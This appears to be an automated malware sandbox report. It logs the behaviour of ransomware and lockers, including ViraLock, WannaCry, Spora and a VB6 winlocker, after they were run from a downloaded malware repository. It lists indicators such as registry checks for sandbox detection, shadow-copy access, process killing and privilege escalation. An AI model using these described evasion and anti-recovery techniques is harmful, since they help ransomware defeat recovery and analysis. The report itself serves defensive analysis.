Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ViraLock.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WinlockerVB6Blacksod.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cscript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe -
Checks processor information in registry 2 TTPs 7 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier dw20.exe -
Enumerates system info in registry 2 TTPs 5 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dw20.exe -
Interacts with shadow copies 3 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 5788 vssadmin.exe -
Kills process with taskkill 4 IoCs
pid Process 1460 taskkill.exe 2956 taskkill.exe 2408 taskkill.exe 772 taskkill.exe -
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Internet Explorer\Main\DisableFirstRunCustomize = "1" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Internet Explorer\GPU\VendorId = "4318" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\StaleCompatCache = "1" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListDomainAttributeSet = "0" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Internet Explorer\Main\OperationalData = "13" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Internet Explorer\VersionManager\FirstCheckForUpdateHighDateTime = "31159504" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Internet Explorer\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Internet Explorer\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\HomepagesUpgradeVersion = "1" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionHigh = "0" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Internet Explorer\GPU\SubSysId = "0" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Internet Explorer\BrowserEmulation IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Internet Explorer\GPU IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Internet Explorer\GPU\DeviceId = "140" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Internet Explorer\Main\OperationalData = "8" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionLow = "395196024" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListXMLVersionHigh = "268435456" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Internet Explorer\VersionManager IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Internet Explorer\VersionManager\FirstCheckForUpdateLowDateTime = "2916267416" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionHigh = "268435456" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Internet Explorer\Main\OperationalData = "9" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionLow = "0" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListXMLVersionLow = "395196024" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Internet Explorer\GPU\SoftwareFallback = "0" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Internet Explorer\GPU\Revision = "0" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Internet Explorer\Main\DisableFirstRunCustomize = "1" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPMigrationVer = "1" IEXPLORE.EXE -
Modifies data under HKEY_USERS 3 IoCs
description ioc Process Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\26\52C64B7E msiexec.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27 msiexec.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings msedge.exe Key created \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings OpenWith.exe -
Modifies registry key 1 TTPs 52 IoCs
pid Process 1656 reg.exe 5932 reg.exe 5884 reg.exe 6680 reg.exe 6180 reg.exe 1648 reg.exe 4804 reg.exe 1072 reg.exe 2976 reg.exe 3624 reg.exe 5848 reg.exe 5244 reg.exe 3628 reg.exe 1008 reg.exe 1648 reg.exe 5304 reg.exe 6708 reg.exe 5496 reg.exe 3960 reg.exe 3460 reg.exe 3200 reg.exe 5644 reg.exe 1972 reg.exe 5268 reg.exe 1772 reg.exe 4196 reg.exe 848 reg.exe 1968 reg.exe 3992 reg.exe 6468 reg.exe 6676 reg.exe 6900 reg.exe 1252 reg.exe 4588 reg.exe 4712 reg.exe 4404 reg.exe 3488 reg.exe 6944 reg.exe 2600 reg.exe 4596 reg.exe 3096 reg.exe 5908 reg.exe 2640 reg.exe 4628 reg.exe 3752 reg.exe 1708 reg.exe 2864 reg.exe 1108 reg.exe 4896 reg.exe 6476 reg.exe 5136 reg.exe 1596 reg.exe -
NTFS ADS 4 IoCs
description ioc Process File opened for modification C:\Users\Admin\Downloads\The-MALWARE-Repo-master.zip:Zone.Identifier msedge.exe File opened for modification C:\Users\Admin\Downloads\The-MALWARE-Repo-master.zip:Zone.Identifier msedge.exe File opened for modification C:\Users\Admin\Downloads\The-MALWARE-Repo-master (1).zip:Zone.Identifier msedge.exe File created C:\af77c1b1-4571-bcc3-4932-a528ae074188.exe\:Zone.Identifier:$DATA SporaRansomware.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1092 msedge.exe 1092 msedge.exe 3700 msedge.exe 3700 msedge.exe 4632 msedge.exe 4632 msedge.exe 2336 identity_helper.exe 2336 identity_helper.exe 1712 msedge.exe 1712 msedge.exe 1712 msedge.exe 1712 msedge.exe 2860 msedge.exe 2860 msedge.exe 3500 msedge.exe 3500 msedge.exe 1484 msedge.exe 1484 msedge.exe 2112 msedge.exe 2112 msedge.exe 1460 ViraLock.exe 1460 ViraLock.exe 1460 ViraLock.exe 1460 ViraLock.exe 392 ViraLock.exe 392 ViraLock.exe 392 ViraLock.exe 392 ViraLock.exe 2820 ViraLock.exe 2820 ViraLock.exe 2820 ViraLock.exe 2820 ViraLock.exe 1476 ViraLock.exe 1476 ViraLock.exe 1476 ViraLock.exe 1476 ViraLock.exe 1460 ViraLock.exe 1460 ViraLock.exe 1460 ViraLock.exe 1460 ViraLock.exe 2600 ViraLock.exe 2600 ViraLock.exe 2600 ViraLock.exe 2600 ViraLock.exe 1596 ViraLock.exe 1596 ViraLock.exe 1596 ViraLock.exe 1596 ViraLock.exe 4812 ViraLock.exe 4812 ViraLock.exe 4812 ViraLock.exe 4812 ViraLock.exe 2372 ViraLock.exe 2372 ViraLock.exe 2372 ViraLock.exe 2372 ViraLock.exe 3204 ViraLock.exe 3204 ViraLock.exe 3204 ViraLock.exe 3204 ViraLock.exe 2112 ViraLock.exe 2112 ViraLock.exe 2112 ViraLock.exe 2112 ViraLock.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 23 IoCs
pid Process 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2092 Client-built.exe Token: SeIncreaseQuotaPrivilege 4484 WMIC.exe Token: SeSecurityPrivilege 4484 WMIC.exe Token: SeTakeOwnershipPrivilege 4484 WMIC.exe Token: SeLoadDriverPrivilege 4484 WMIC.exe Token: SeSystemProfilePrivilege 4484 WMIC.exe Token: SeSystemtimePrivilege 4484 WMIC.exe Token: SeProfSingleProcessPrivilege 4484 WMIC.exe Token: SeIncBasePriorityPrivilege 4484 WMIC.exe Token: SeCreatePagefilePrivilege 4484 WMIC.exe Token: SeBackupPrivilege 4484 WMIC.exe Token: SeRestorePrivilege 4484 WMIC.exe Token: SeShutdownPrivilege 4484 WMIC.exe Token: SeDebugPrivilege 4484 WMIC.exe Token: SeSystemEnvironmentPrivilege 4484 WMIC.exe Token: SeRemoteShutdownPrivilege 4484 WMIC.exe Token: SeUndockPrivilege 4484 WMIC.exe Token: SeManageVolumePrivilege 4484 WMIC.exe Token: 33 4484 WMIC.exe Token: 34 4484 WMIC.exe Token: 35 4484 WMIC.exe Token: 36 4484 WMIC.exe Token: SeIncreaseQuotaPrivilege 4484 WMIC.exe Token: SeSecurityPrivilege 4484 WMIC.exe Token: SeTakeOwnershipPrivilege 4484 WMIC.exe Token: SeLoadDriverPrivilege 4484 WMIC.exe Token: SeSystemProfilePrivilege 4484 WMIC.exe Token: SeSystemtimePrivilege 4484 WMIC.exe Token: SeProfSingleProcessPrivilege 4484 WMIC.exe Token: SeIncBasePriorityPrivilege 4484 WMIC.exe Token: SeCreatePagefilePrivilege 4484 WMIC.exe Token: SeBackupPrivilege 4484 WMIC.exe Token: SeRestorePrivilege 4484 WMIC.exe Token: SeShutdownPrivilege 4484 WMIC.exe Token: SeDebugPrivilege 4484 WMIC.exe Token: SeSystemEnvironmentPrivilege 4484 WMIC.exe Token: SeRemoteShutdownPrivilege 4484 WMIC.exe Token: SeUndockPrivilege 4484 WMIC.exe Token: SeManageVolumePrivilege 4484 WMIC.exe Token: 33 4484 WMIC.exe Token: 34 4484 WMIC.exe Token: 35 4484 WMIC.exe Token: 36 4484 WMIC.exe Token: SeBackupPrivilege 3140 vssvc.exe Token: SeRestorePrivilege 3140 vssvc.exe Token: SeAuditPrivilege 3140 vssvc.exe Token: SeRestorePrivilege 4520 dw20.exe Token: SeBackupPrivilege 4520 dw20.exe Token: SeBackupPrivilege 4520 dw20.exe Token: SeBackupPrivilege 4520 dw20.exe Token: SeDebugPrivilege 1460 taskkill.exe Token: SeDebugPrivilege 2956 taskkill.exe Token: SeDebugPrivilege 772 taskkill.exe Token: SeDebugPrivilege 2408 taskkill.exe Token: SeSecurityPrivilege 5868 msiexec.exe Token: SeCreateTokenPrivilege 4676 WinlockerVB6Blacksod.exe Token: SeAssignPrimaryTokenPrivilege 4676 WinlockerVB6Blacksod.exe Token: SeLockMemoryPrivilege 4676 WinlockerVB6Blacksod.exe Token: SeIncreaseQuotaPrivilege 4676 WinlockerVB6Blacksod.exe Token: SeMachineAccountPrivilege 4676 WinlockerVB6Blacksod.exe Token: SeTcbPrivilege 4676 WinlockerVB6Blacksod.exe Token: SeSecurityPrivilege 4676 WinlockerVB6Blacksod.exe Token: SeTakeOwnershipPrivilege 4676 WinlockerVB6Blacksod.exe Token: SeLoadDriverPrivilege 4676 WinlockerVB6Blacksod.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe -
Suspicious use of SendNotifyMessage 16 IoCs
pid Process 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe 3700 msedge.exe -
Suspicious use of SetWindowsHookEx 19 IoCs
pid Process 4896 OpenWith.exe 4232 !WannaDecryptor!.exe 4232 !WannaDecryptor!.exe 476 @[email protected] 476 @[email protected] 7012 @[email protected] 7012 @[email protected] 4328 !WannaDecryptor!.exe 4328 !WannaDecryptor!.exe 7152 !WannaDecryptor!.exe 7152 !WannaDecryptor!.exe 5324 !WannaDecryptor!.exe 5324 !WannaDecryptor!.exe 676 @[email protected] 676 @[email protected] 6752 @[email protected] 5580 @[email protected] 5408 @[email protected] 7004 @[email protected] -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3700 wrote to memory of 1012 3700 msedge.exe 81 PID 3700 wrote to memory of 1012 3700 msedge.exe 81 PID 3700 wrote to memory of 3068 3700 msedge.exe 82 PID 3700 wrote to memory of 3068 3700 msedge.exe 82 PID 3700 wrote to memory of 3068 3700 msedge.exe 82 PID 3700 wrote to memory of 3068 3700 msedge.exe 82 PID 3700 wrote to memory of 3068 3700 msedge.exe 82 PID 3700 wrote to memory of 3068 3700 msedge.exe 82 PID 3700 wrote to memory of 3068 3700 msedge.exe 82 PID 3700 wrote to memory of 3068 3700 msedge.exe 82 PID 3700 wrote to memory of 3068 3700 msedge.exe 82 PID 3700 wrote to memory of 3068 3700 msedge.exe 82 PID 3700 wrote to memory of 3068 3700 msedge.exe 82 PID 3700 wrote to memory of 3068 3700 msedge.exe 82 PID 3700 wrote to memory of 3068 3700 msedge.exe 82 PID 3700 wrote to memory of 3068 3700 msedge.exe 82 PID 3700 wrote to memory of 3068 3700 msedge.exe 82 PID 3700 wrote to memory of 3068 3700 msedge.exe 82 PID 3700 wrote to memory of 3068 3700 msedge.exe 82 PID 3700 wrote to memory of 3068 3700 msedge.exe 82 PID 3700 wrote to memory of 3068 3700 msedge.exe 82 PID 3700 wrote to memory of 3068 3700 msedge.exe 82 PID 3700 wrote to memory of 3068 3700 msedge.exe 82 PID 3700 wrote to memory of 3068 3700 msedge.exe 82 PID 3700 wrote to memory of 3068 3700 msedge.exe 82 PID 3700 wrote to memory of 3068 3700 msedge.exe 82 PID 3700 wrote to memory of 3068 3700 msedge.exe 82 PID 3700 wrote to memory of 3068 3700 msedge.exe 82 PID 3700 wrote to memory of 3068 3700 msedge.exe 82 PID 3700 wrote to memory of 3068 3700 msedge.exe 82 PID 3700 wrote to memory of 3068 3700 msedge.exe 82 PID 3700 wrote to memory of 3068 3700 msedge.exe 82 PID 3700 wrote to memory of 3068 3700 msedge.exe 82 PID 3700 wrote to memory of 3068 3700 msedge.exe 82 PID 3700 wrote to memory of 3068 3700 msedge.exe 82 PID 3700 wrote to memory of 3068 3700 msedge.exe 82 PID 3700 wrote to memory of 3068 3700 msedge.exe 82 PID 3700 wrote to memory of 3068 3700 msedge.exe 82 PID 3700 wrote to memory of 3068 3700 msedge.exe 82 PID 3700 wrote to memory of 3068 3700 msedge.exe 82 PID 3700 wrote to memory of 3068 3700 msedge.exe 82 PID 3700 wrote to memory of 3068 3700 msedge.exe 82 PID 3700 wrote to memory of 1092 3700 msedge.exe 83 PID 3700 wrote to memory of 1092 3700 msedge.exe 83 PID 3700 wrote to memory of 1256 3700 msedge.exe 84 PID 3700 wrote to memory of 1256 3700 msedge.exe 84 PID 3700 wrote to memory of 1256 3700 msedge.exe 84 PID 3700 wrote to memory of 1256 3700 msedge.exe 84 PID 3700 wrote to memory of 1256 3700 msedge.exe 84 PID 3700 wrote to memory of 1256 3700 msedge.exe 84 PID 3700 wrote to memory of 1256 3700 msedge.exe 84 PID 3700 wrote to memory of 1256 3700 msedge.exe 84 PID 3700 wrote to memory of 1256 3700 msedge.exe 84 PID 3700 wrote to memory of 1256 3700 msedge.exe 84 PID 3700 wrote to memory of 1256 3700 msedge.exe 84 PID 3700 wrote to memory of 1256 3700 msedge.exe 84 PID 3700 wrote to memory of 1256 3700 msedge.exe 84 PID 3700 wrote to memory of 1256 3700 msedge.exe 84 PID 3700 wrote to memory of 1256 3700 msedge.exe 84 PID 3700 wrote to memory of 1256 3700 msedge.exe 84 PID 3700 wrote to memory of 1256 3700 msedge.exe 84 PID 3700 wrote to memory of 1256 3700 msedge.exe 84 PID 3700 wrote to memory of 1256 3700 msedge.exe 84 PID 3700 wrote to memory of 1256 3700 msedge.exe 84 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 2 IoCs
pid Process 3156 attrib.exe 1072 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Client-built.exe"C:\Users\Admin\AppData\Local\Temp\Client-built.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2092
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3700 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff87e1c3cb8,0x7ff87e1c3cc8,0x7ff87e1c3cd82⤵PID:1012
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1900,13931885699748010713,3136169892683585256,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1920 /prefetch:22⤵PID:3068
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1900,13931885699748010713,3136169892683585256,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2276 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:1092
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1900,13931885699748010713,3136169892683585256,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2736 /prefetch:82⤵PID:1256
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,13931885699748010713,3136169892683585256,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3236 /prefetch:12⤵PID:944
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,13931885699748010713,3136169892683585256,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3248 /prefetch:12⤵PID:3912
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,13931885699748010713,3136169892683585256,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4592 /prefetch:12⤵PID:1948
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,13931885699748010713,3136169892683585256,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4628 /prefetch:12⤵PID:2364
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1900,13931885699748010713,3136169892683585256,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3896 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4632
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,13931885699748010713,3136169892683585256,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5184 /prefetch:12⤵PID:4544
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1900,13931885699748010713,3136169892683585256,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5352 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:2336
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,13931885699748010713,3136169892683585256,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5128 /prefetch:12⤵PID:4800
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,13931885699748010713,3136169892683585256,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3480 /prefetch:12⤵PID:3940
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,13931885699748010713,3136169892683585256,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5668 /prefetch:12⤵PID:1960
-
-
